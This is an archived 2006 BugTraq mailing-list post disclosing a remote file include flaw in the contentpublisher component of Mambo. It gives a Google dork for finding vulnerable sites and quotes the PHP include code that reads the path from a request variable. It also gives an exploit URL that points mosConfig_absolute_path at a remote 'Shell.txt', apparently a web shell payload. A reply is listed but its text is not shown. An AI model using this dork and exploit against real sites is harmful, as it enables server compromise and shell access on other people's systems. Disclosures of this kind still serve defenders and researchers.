BugTraq
contentpublisher Mambo Component Remote File Include Vulnerabilities Aug 17 2006 08:38PM
crackers_child sibersavascilar com (1 replies)
!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!

------------------------------------------------------------------------
--------

Title : contentpublisher Mambo Component Remote File Include Vulnerabilities

------------------------------------------------------------------------
--------

#Author: Crackers_Child

#cont@ct: crackers_child (at) sibersavascilar (dot) com [email concealed]

------------------------------------------------------------------------
--------

Google Dorks : inurl:"/com_contentpublisher/"

------------------------- -------------------------------------------------------

Application : contentpublisher/ Component of Mambo

------------------------------------------------------------------------
--------

Bug İn contentpublisher.php

global $my, $mosConfig_live_site, $mosConfig_lang;

if (file_exists($mosConfig_absolute_path.'/components/com_contentpublisher/
languages/'.$mosConfig_lang.'.php')) {

include($mosConfig_absolute_path.'/components/com_contentpublisher/langu
ages/'.$mosConfig_lang.'.php');

} else {

include($mosConfig_absolute_path.'/components/com_contentpublisher/langu
ages/english.php');

}

------------------------------------------------------------------------
--------

Exploit:

http://[target]/[mambo_path]/components/contentpublisher/contentpublishe
r.php?mosConfig_absolute_path=Shell.txt?

------------------------------------------------------------------------
--------

greets:

All My Friends And SiberSavascilar.Com Members !

------------------------------------------------------------------------
--------

--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------

[ reply ]
Re: contentpublisher Mambo Component Remote File Include Vulnerabilities Aug 23 2006 10:51PM
Carsten Eilers (ceilers-lists gmx de)


 

Privacy Statement
Copyright 2010, SecurityFocus